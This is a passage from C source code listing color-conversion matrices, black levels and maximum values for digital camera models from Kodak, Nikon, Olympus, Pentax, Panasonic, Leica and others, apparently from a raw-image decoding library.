{ 11313,-3559,-1101,-3893,11891,2257,-1214,2398,4908 } },
{ "Kodak EasyShare Z981", 0, 0,
{ 12729,-4717,-1188,-1367,9187,2582,274,860,4411 } },
{ "Kodak EasyShare Z990", 0, 0xfed,
{ 11749,-4048,-1309,-1867,10572,1489,-138,1449,4522 } },
{ "Kodak EASYSHARE Z1015", 0, 0xef1,
{ 11265,-4286,-992,-4694,12343,2647,-1090,1523,5447 } },
{ "Leaf CMost", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Valeo 6", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Aptus 54S", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Leaf Aptus 65", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Aptus 75", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Credo 40", 0, 0,
{ 8035, 435, -962, -6001, 13872, 2320, -1159, 3065, 5434 } },
{ "Leaf Credo 50", 0, 0,
{ 3984, 0, 0, 0, 10000, 0, 0, 0, 7666 } },
{ "Leaf Credo 60", 0, 0,
{ 8035, 435, -962, -6001, 13872,2320,-1159,3065,5434 } },
{ "Leaf Credo 80", 0, 0,
{ 6294, 686, -712, -5435, 13417, 2211, -1006, 2435, 5042 } },
{ "Leaf", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Mamiya ZD", 0, 0,
{ 7645,2579,-1363,-8689,16717,2015,-3712,5941,5961 } },
{ "Micron 2010", 110, 0, /* DJC */
{ 16695,-3761,-2151,155,9682,163,3433,951,4904 } },
{ "Minolta DiMAGE 5", 0, 0xf7d,
{ 8983,-2942,-963,-6556,14476,2237,-2426,2887,8014 } },
{ "Minolta DiMAGE 7Hi", 0, 0xf7d,
{ 11368,-3894,-1242,-6521,14358,2339,-2475,3056,7285 } },
{ "Minolta DiMAGE 7", 0, 0xf7d,
{ 9144,-2777,-998,-6676,14556,2281,-2470,3019,7744 } },
{ "Minolta DiMAGE A1", 0, 0xf8b,
{ 9274,-2547,-1167,-8220,16323,1943,-2273,2720,8340 } },
{ "Minolta DiMAGE A200", 0, 0,
{ 8560,-2487,-986,-8112,15535,2771,-1209,1324,7743 } },
{ "Minolta DiMAGE A2", 0, 0xf8f,
{ 9097,-2726,-1053,-8073,15506,2762,-966,981,7763 } },
{ "Minolta DiMAGE Z2", 0, 0, /* DJC */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Minolta DYNAX 5", 0, 0xffb,
{ 10284,-3283,-1086,-7957,15762,2316,-829,882,6644 } },
{ "Minolta DYNAX 7", 0, 0xffb,
{ 10239,-3104,-1099,-8037,15727,2451,-927,925,6871 } },
{ "Motorola PIXL", 0, 0, /* DJC */
{ 8898,-989,-1033,-3292,11619,1674,-661,3178,5216 } },
{ "Nikon D100", 0, 0,
{ 5902,-933,-782,-8983,16719,2354,-1402,1455,6464 } },
{ "Nikon D1H", 0, 0,
{ 7577,-2166,-926,-7454,15592,1934,-2377,2808,8606 } },
{ "Nikon D1X", 0, 0,
{ 7702,-2245,-975,-9114,17242,1875,-2679,3055,8521 } },
{ "Nikon D1", 0, 0, /* multiplied by 2.218750, 1.0, 1.148438 */
{ 16772,-4726,-2141,-7611,15713,1972,-2846,3494,9521 } },
{ "Nikon D200", 0, 0xfbc,
{ 8367,-2248,-763,-8758,16447,2422,-1527,1550,8053 } },
{ "Nikon D2H", 0, 0,
{ 5710,-901,-615,-8594,16617,2024,-2975,4120,6830 } },
{ "Nikon D2X", 0, 0,
{ 10231,-2769,-1255,-8301,15900,2552,-797,680,7148 } },
{ "Nikon D3000", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D3100", 0, 0,
{ 7911,-2167,-813,-5327,13150,2408,-1288,2483,7968 } },
{ "Nikon D3200", 0, 0xfb9,
{ 7013,-1408,-635,-5268,12902,2640,-1470,2801,7379 } },
{ "Nikon D3300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D3400", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D300", 0, 0,
{ 9030,-1992,-715,-8465,16302,2255,-2689,3217,8069 } },
{ "Nikon D3X", 0, 0,
{ 7171,-1986,-648,-8085,15555,2718,-2170,2512,7457 } },
{ "Nikon D3S", 0, 0,
{ 8828,-2406,-694,-4874,12603,2541,-660,1509,7587 } },
{ "Nikon D3", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D40X", 0, 0,
{ 8819,-2543,-911,-9025,16928,2151,-1329,1213,8449 } },
{ "Nikon D40", 0, 0,
{ 6992,-1668,-806,-8138,15748,2543,-874,850,7897 } },
{ "Nikon D4S", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D4", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon Df", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D5000", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2433,2826,8064 } },
{ "Nikon D5100", 0, 0x3de6,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D5200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D5300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D5500", 0, 0,
{ 8821,-2938,-785,-4178,12142,2287,-824,1651,6860 } },
{ "Nikon D500", 0, 0,
{ 8813,-3210,-1036,-4703,12868,2021,-1054,1940,6129 } },
{ "Nikon D50", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D5", 0, 0,
{ 9200,-3522,-992,-5755,13803,2117,-753,1486,6338 } },
{ "Nikon D600", 0, 0x3e07,
{ 8178,-2245,-609,-4857,12394,2776,-1207,2086,7298 } },
{ "Nikon D610",0, 0,
{ 10426,-4005,-444,-3565,11764,1403,-1206,2266,6549 } },
{ "Nikon D60", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D7000", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D7100", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D7200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D750", -600, 0,
{ 9020,-2890,-715,-4535,12436,2348,-934,1919,7086 } },
{ "Nikon D700", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D70", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D810A", 0, 0,
{ 11973, -5685, -888, -1965, 10326, 1901, -115, 1123, 7169 } },
{ "Nikon D810", 0, 0,
{ 9369,-3195,-791,-4488,12430,2301,-893,1796,6872 } },
{ "Nikon D800", 0, 0,
{ 7866,-2108,-555,-4869,12483,2681,-1176,2069,7501 } },
{ "Nikon D80", 0, 0,
{ 8629,-2410,-883,-9055,16940,2171,-1490,1363,8520 } },
{ "Nikon D90", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2434,2826,8064 } },
{ "Nikon E700", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E800", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E950", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E995", 0, 0, /* copied from E5000 */
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E2100", 0, 0, /* copied from Z2, new white balance */
{ 13142,-4152,-1596,-4655,12374,2282,-1769,2696,6711 } },
{ "Nikon E2500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E3200", 0, 0, /* DJC */
{ 9846,-2085,-1019,-3278,11109,2170,-774,2134,5745 } },
{ "Nikon E4300", 0, 0, /* copied from Minolta DiMAGE Z2 */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Nikon E4500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5000", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5400", 0, 0,
{ 9349,-2987,-1001,-7919,15766,2266,-2098,2680,6839 } },
{ "Nikon E5700", 0, 0,
{ -5368,11478,2368,5537,-113,3148,-4969,10021,5782,778,9028,211 } },
{ "Nikon E8400", 0, 0,
{ 7842,-2320,-992,-8154,15718,2599,-1098,1342,7560 } },
{ "Nikon E8700", 0, 0,
{ 8489,-2583,-1036,-8051,15583,2643,-1307,1407,7354 } },
{ "Nikon E8800", 0, 0,
{ 7971,-2314,-913,-8451,15762,2894,-1442,1520,7610 } },
{ "Nikon COOLPIX A", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon COOLPIX B700", 0, 0,
{ 14387,-6014,-1299,-1357,9975,1616,467,1047,4744 } },
{ "Nikon COOLPIX P330", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P340", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P6000", 0, 0,
{ 9698,-3367,-914,-4706,12584,2368,-837,968,5801 } },
{ "Nikon COOLPIX P7000", 0, 0,
{ 11432,-3679,-1111,-3169,11239,2202,-791,1380,4455 } },
{ "Nikon COOLPIX P7100", 0, 0,
{ 11053,-4269,-1024,-1976,10182,2088,-526,1263,4469 } },
{ "Nikon COOLPIX P7700", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P7800", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon 1 V3", -200, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J4", 0, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J5", 0, 0,
{ 7520,-2518,-645,-3844,12102,1945,-913,2249,6835} },
{ "Nikon 1 S2", -200, 0,
{ 6612,-1342,-618,-3338,11055,2623,-174,1792,5075 } },
{ "Nikon 1 V2", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 J3", 0, 0,
{ 8144,-2671,-473,-1740,9834,1601,-58,1971,4296 } },
{ "Nikon 1 AW1", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 ", 0, 0, /* J1, J2, S1, V1 */
{ 8994,-2667,-865,-4594,12324,2552,-699,1786,6260 } },
{ "Olympus AIR-A01", 0, 0xfe1,
{ 8992,-3093,-639,-2563,10721,2122,-437,1270,5473 } },
{ "Olympus C5050", 0, 0,
{ 10508,-3124,-1273,-6079,14294,1901,-1653,2306,6237 } },
{ "Olympus C5060", 0, 0,
{ 10445,-3362,-1307,-7662,15690,2058,-1135,1176,7602 } },
{ "Olympus C7070", 0, 0,
{ 10252,-3531,-1095,-7114,14850,2436,-1451,1723,6365 } },
{ "Olympus C70", 0, 0,
{ 10793,-3791,-1146,-7498,15177,2488,-1390,1577,7321 } },
{ "Olympus C80", 0, 0,
{ 8606,-2509,-1014,-8238,15714,2703,-942,979,7760 } },
{ "Olympus E-10", 0, 0xffc,
{ 12745,-4500,-1416,-6062,14542,1580,-1934,2256,6603 } },
{ "Olympus E-1", 0, 0,
{ 11846,-4767,-945,-7027,15878,1089,-2699,4122,8311 } },
{ "Olympus E-20", 0, 0xffc,
{ 13173,-4732,-1499,-5807,14036,1895,-2045,2452,7142 } },
{ "Olympus E-300", 0, 0,
{ 7828,-1761,-348,-5788,14071,1830,-2853,4518,6557 } },
{ "Olympus E-330", 0, 0,
{ 8961,-2473,-1084,-7979,15990,2067,-2319,3035,8249 } },
{ "Olympus E-30", 0, 0xfbc,
{ 8144,-1861,-1111,-7763,15894,1929,-1865,2542,7607 } },
{ "Olympus E-3", 0, 0xf99,
{ 9487,-2875,-1115,-7533,15606,2010,-1618,2100,7389 } },
{ "Olympus E-400", 0, 0,
{ 6169,-1483,-21,-7107,14761,2536,-2904,3580,8568 } },
{ "Olympus E-410", 0, 0xf6a,
{ 8856,-2582,-1026,-7761,15766,2082,-2009,2575,7469 } },
{ "Olympus E-420", 0, 0xfd7,
{ 8746,-2425,-1095,-7594,15612,2073,-1780,2309,7416 } },
{ "Olympus E-450", 0, 0xfd2,
{ 8745,-2425,-1095,-7594,15613,2073,-1780,2309,7416 } },
{ "Olympus E-500", 0, 0,
{ 8136,-1968,-299,-5481,13742,1871,-2556,4205,6630 } },
{ "Olympus E-510", 0, 0xf6a,
{ 8785,-2529,-1033,-7639,15624,2112,-1783,2300,7817 } },
{ "Olympus E-520", 0, 0xfd2,
{ 8344,-2322,-1020,-7596,15635,2048,-1748,2269,7287 } },
{ "Olympus E-5", 0, 0xeec,
{ 11200,-3783,-1325,-4576,12593,2206,-695,1742,7504 } },
{ "Olympus E-600", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-620", 0, 0xfaf,
{ 8453,-2198,-1092,-7609,15681,2008,-1725,2337,7824 } },
{ "Olympus E-P1", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P2", 0, 0xffd,
{ 8343,-2050,-1021,-7715,15705,2103,-1831,2380,8235 } },
{ "Olympus E-P3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-P5", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL1s", 0, 0,
{ 11409,-3872,-1393,-4572,12757,2003,-709,1810,7415 } },
{ "Olympus E-PL1", 0, 0,
{ 11408,-4289,-1215,-4286,12385,2118,-387,1467,7787 } },
{ "Olympus E-PL2", 0, 0xcf3,
{ 15030,-5552,-1806,-3987,12387,1767,-592,1670,7023 } },
{ "Olympus E-PL3", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PL5", 0, 0xfcb,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL6", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-PL7", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PL8", 0, 0,
{ 9197,-3190,-659,-2606,10830,2039,-458,1250,5458 } },
{ "Olympus E-PM1", 0, 0,
{ 7575,-2159,-571,-3722,11341,2725,-1434,2819,6271 } },
{ "Olympus E-PM2", 0, 0,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M10", 0, 0, /* Same for E-M10MarkII */
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus E-M1MarkII", 0, 0, /* Adobe */
{ 8380, -2630, -639, -2887, 10725, 2496, -627, 1427, 5438 }},
{ "Olympus E-M1", 0, 0,
{ 7687,-1984,-606,-4327,11928,2721,-1381,2339,6452 } },
{ "Olympus E-M5MarkII", 0, 0,
{ 9422,-3258,-711,-2655,10898,2015,-512,1354,5512 } },
{ "Olympus E-M5", 0, 0xfe1,
{ 8380,-2630,-639,-2887,10725,2496,-627,1427,5438 } },
{ "Olympus PEN-F",0, 0,
{ 9476,-3182,-765,-2613,10958,1893,-449,1315,5268 } },
{ "Olympus SP350", 0, 0,
{ 12078,-4836,-1069,-6671,14306,2578,-786,939,7418 } },
{ "Olympus SP3", 0, 0,
{ 11766,-4445,-1067,-6901,14421,2707,-1029,1217,7572 } },
{ "Olympus SP500UZ", 0, 0xfff,
{ 9493,-3415,-666,-5211,12334,3260,-1548,2262,6482 } },
{ "Olympus SP510UZ", 0, 0xffe,
{ 10593,-3607,-1010,-5881,13127,3084,-1200,1805,6721 } },
{ "Olympus SP550UZ", 0, 0xffe,
{ 11597,-4006,-1049,-5432,12799,2957,-1029,1750,6516 } },
{ "Olympus SP560UZ", 0, 0xff9,
{ 10915,-3677,-982,-5587,12986,2911,-1168,1968,6223 } },
{ "Olympus SP570UZ", 0, 0,
{ 11522,-4044,-1146,-4736,12172,2904,-988,1829,6039 } },
{ "Olympus SH-2", 0, 0,
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus SH-3", 0, 0, /* Alias of SH-2 */
{ 10156,-3425,-1077,-2611,11177,1624,-385,1592,5080 } },
{ "Olympus STYLUS1",0, 0,
{ 11976,-5518,-545,-1419,10472,846,-475,1766,4524 } },
{ "Olympus TG-4", 0, 0,
{ 11426,-4159,-1126,-2066,10678,1593,-120,1327,4998 } },
{ "Olympus XZ-10", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "Olympus XZ-1", 0, 0,
{ 10901,-4095,-1074,-1141,9208,2293,-62,1417,5158 } },
{ "Olympus XZ-2", 0, 0,
{ 9777,-3483,-925,-2886,11297,1800,-602,1663,5134 } },
{ "OmniVision", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Pentax *ist DL2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DL", 0, 0,
{ 10829,-2838,-1115,-8339,15817,2696,-837,680,11939 } },
{ "Pentax *ist DS2", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Pentax *ist DS", 0, 0,
{ 10371,-2333,-1206,-8688,16231,2602,-1230,1116,11282 } },
{ "Pentax *ist D", 0, 0,
{ 9651,-2059,-1189,-8881,16512,2487,-1460,1345,10687 } },
{ "Pentax K10D", 0, 0,
{ 9566,-2863,-803,-7170,15172,2112,-818,803,9705 } },
{ "Pentax K1", 0, 0,
{ 11095,-3157,-1324,-8377,15834,2720,-1108,947,11688 } },
{ "Pentax K20D", 0, 0,
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Pentax K200D", 0, 0,
{ 9186,-2678,-907,-8693,16517,2260,-1129,1094,8524 } },
{ "Pentax K2000", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-m", 0, 0,
{ 11057,-3604,-1155,-5152,13046,2329,-282,375,8104 } },
{ "Pentax K-x", 0, 0,
{ 8843,-2837,-625,-5025,12644,2668,-411,1234,7410 } },
{ "Pentax K-r", 0, 0,
{ 9895,-3077,-850,-5304,13035,2521,-883,1768,6936 } },
{ "Pentax K-1", 0, 0,
{ 8566,-2746,-1201,-3612,12204,1550,-893,1680,6264 } },
{ "Pentax K-30", 0, 0,
{ 8710,-2632,-1167,-3995,12301,1881,-981,1719,6535 } },
{ "Pentax K-3 II", 0, 0,
{ 8626,-2607,-1155,-3995,12301,1881,-1039,1822,6925 } },
{ "Pentax K-3", 0, 0,
{ 7415,-2052,-721,-5186,12788,2682,-1446,2157,6773 } },
{ "Pentax K-5 II", 0, 0,
{ 8170,-2725,-639,-4440,12017,2744,-771,1465,6599 } },
{ "Pentax K-5", 0, 0,
{ 8713,-2833,-743,-4342,11900,2772,-722,1543,6247 } },
{ "Pentax K-70", 0, 0,
{8766, -3149, -747, -3976, 11943, 2292, -517, 1259, 5552 }},
{ "Pentax K-7", 0, 0,
{ 9142,-2947,-678,-8648,16967,1663,-2224,2898,8615 } },
{ "Pentax K-S1", 0, 0,
{ 8512,-3211,-787,-4167,11966,2487,-638,1288,6054 } },
{ "Pentax K-S2", 0, 0,
{ 8662,-3280,-798,-3928,11771,2444,-586,1232,6054 } },
{ "Pentax Q-S1", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax MX-1", 0, 0,
{ 8804,-2523,-1238,-2423,11627,860,-682,1774,4753 } },
{ "Pentax Q10", 0, 0,
{ 12995,-5593,-1107,-1879,10139,2027,-64,1233,4919 } },
{ "Pentax 645D", 0, 0x3e00,
{ 10646,-3593,-1158,-3329,11699,1831,-667,2874,6287 } },
{ "Pentax 645Z", 0, 0, /* Adobe */
{ 9702, -3060, -1254, -3685, 12133, 1721, -1086, 2010, 6971}},
{ "Panasonic DMC-CM10", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-CM1", -15, 0,
{ 8770, -3194,-820,-2871,11281,1803,-513,1552,4434 } },
{ "Panasonic DMC-FZ8", 0, 0xf7f,
{ 8986,-2755,-802,-6341,13575,3077,-1476,2144,6379 } },
{ "Panasonic DMC-FZ18", 0, 0,
{ 9932,-3060,-935,-5809,13331,2753,-1267,2155,5575 } },
{ "Panasonic DMC-FZ28", -15, 0xf96,
{ 10109,-3488,-993,-5412,12812,2916,-1305,2140,5543 } },
{ "Panasonic DMC-FZ300", -15, 0xfff,
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ330", -15, 0xfff, // same as FZ300
{ 8378,-2798,-769,-3068,11410,1877,-538,1792,4623 } },
{ "Panasonic DMC-FZ30", 0, 0xf94,
{ 10976,-4029,-1141,-7918,15491,2600,-1670,2071,8246 } },
{ "Panasonic DMC-FZ3", -15, 0,
{ 9938,-2780,-890,-4604,12393,2480,-1117,2304,4620 } },
{ "Panasonic DMC-FZ4", -15, 0,
{ 13639,-5535,-1371,-1698,9633,2430,316,1152,4108 } },
{ "Panasonic DMC-FZ50", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-FZ7", -15, 0,
{ 11532,-4324,-1066,-2375,10847,1749,-564,1699,4351 } },
{ "Leica V-LUX1", 0, 0,
{ 7906,-2709,-594,-6231,13351,3220,-1922,2631,6537 } },
{ "Panasonic DMC-L10", -15, 0xf96,
{ 8025,-1942,-1050,-7920,15904,2100,-2456,3005,7039 } },
{ "Panasonic DMC-L1", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Leica DIGILUX 3", 0, 0xf7f,
{ 8054,-1885,-1025,-8349,16367,2040,-2805,3542,7629 } },
{ "Panasonic DMC-LC1", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Leica DIGILUX 2", 0, 0,
{ 11340,-4069,-1275,-7555,15266,2448,-2960,3426,7685 } },
{ "Panasonic DMC-LX100", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX (Typ 109)", -15, 0,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Panasonic DMC-LF1", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Leica C (Typ 112)", -15, 0,
{ 9379,-3267,-816,-3227,11560,1881,-926,1928,5340 } },
{ "Panasonic DMC-LX9", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX10", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX15", -15, 0, /* markets: LX9 LX10 LX15 */
{ 7790, -2736, -755, -3452, 11870, 1769, -628, 1647, 4898 }}, /* Adobe*/
{ "Panasonic DMC-LX1", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Leica D-Lux (Typ 109)", 0, 0xf7f,
{ 8844,-3538,-768,-3709,11762,2200,-698,1792,5220 } },
{ "Leica D-LUX2", 0, 0xf7f,
{ 10704,-4187,-1230,-8314,15952,2501,-920,945,8927 } },
{ "Panasonic DMC-LX2", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Leica D-LUX3", 0, 0,
{ 8048,-2810,-623,-6450,13519,3272,-1700,2146,7049 } },
{ "Panasonic DMC-LX3", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Leica D-LUX 4", -15, 0,
{ 8128,-2668,-655,-6134,13307,3161,-1782,2568,6083 } },
{ "Panasonic DMC-LX5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Leica D-LUX 5", -15, 0,
{ 10909,-4295,-948,-1333,9306,2399,22,1738,4582 } },
{ "Panasonic DMC-LX7", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Leica D-LUX 6", -15, 0,
{ 10148,-3743,-991,-2837,11366,1659,-701,1893,4899 } },
{ "Panasonic DMC-FZ1000", -15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Leica V-LUX (Typ 114)", 15, 0,
{ 7830,-2696,-763,-3325,11667,1866,-641,1712,4824 } },
{ "Panasonic DMC-FZ100", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Leica V-LUX 2", -15, 0xfff,
{ 16197,-6146,-1761,-2393,10765,1869,366,2238,5248 } },
{ "Panasonic DMC-FZ150", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Leica V-LUX 3", -15, 0xfff,
{ 11904,-4541,-1189,-2355,10899,1662,-296,1586,4289 } },
{ "Panasonic DMC-FZ2000", -15, 0, /* markets: DMC-FZ2000,DMC-FZ2500,FZH1 */
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ2500", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZH1", -15, 0,
{ 7386, -2443, -743, -3437, 11864, 1757, -608, 1660, 4766 }},
{ "Panasonic DMC-FZ200", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Leica V-LUX 4", -15, 0xfff,
{ 8112,-2563,-740,-3730,11784,2197,-941,2075,4933 } },
{ "Panasonic DMC-FX150", -15, 0xfff,
{ 9082,-2907,-925,-6119,13377,3058,-1797,2641,5609 } },
{ "Panasonic DMC-G10", 0, 0,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G1", -15, 0xf94,
{ 8199,-2065,-1056,-8124,16156,2033,-2458,3022,7220 } },
{ "Panasonic DMC-G2", -15, 0xf3c,
{ 10113,-3400,-1114,-4765,12683,2317,-377,1437,6710 } },
{ "Panasonic DMC-G3", -15, 0xfff,
{ 6763,-1919,-863,-3868,11515,2684,-1216,2387,5879 } },
{ "Panasonic DMC-G5", -15, 0xfff,
{ 7798,-2562,-740,-3879,11584,2613,-1055,2248,5434 } },
{ "Panasonic DMC-G6", -15, 0xfff,
{ 8294,-2891,-651,-3869,11590,2595,-1183,2267,5352 } },
{ "Panasonic DMC-G7", -15, 0xfff,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-G8", -15, 0xfff, /* markets: DMC-G8, DMC-G80, DMC-G81, DMC-G85 */
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF1", -15, 0xf92,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF2", -15, 0xfff,
{ 7888,-1902,-1011,-8106,16085,2099,-2353,2866,7330 } },
{ "Panasonic DMC-GF3", -15, 0xfff,
{ 9051,-2468,-1204,-5212,13276,2121,-1197,2510,6890 } },
{ "Panasonic DMC-GF5", -15, 0xfff,
{ 8228,-2945,-660,-3938,11792,2430,-1094,2278,5793 } },
{ "Panasonic DMC-GF6", -15, 0,
{ 8130,-2801,-946,-3520,11289,2552,-1314,2511,5791 } },
{ "Panasonic DMC-GF7", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GF8", -15, 0,
{ 7610,-2780,-576,-4614,12195,2733,-1375,2393,6490 } },
{ "Panasonic DMC-GH1", -15, 0xf92,
{ 6299,-1466,-532,-6535,13852,2969,-2331,3112,5984 } },
{ "Panasonic DMC-GH2", -15, 0xf95,
{ 7780,-2410,-806,-3913,11724,2484,-1018,2390,5298 } },
{ "Panasonic DMC-GH3", -15, 0,
{ 6559,-1752,-491,-3672,11407,2586,-962,1875,5130 } },
{ "Panasonic DMC-GH4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Yuneec CGO4", -15, 0,
{ 7122,-2108,-512,-3155,11201,2231,-541,1423,5045 } },
{ "Panasonic DMC-GM1", -15, 0,
{ 6770,-1895,-744,-5232,13145,2303,-1664,2691,5703 } },
{ "Panasonic DMC-GM5", -15, 0,
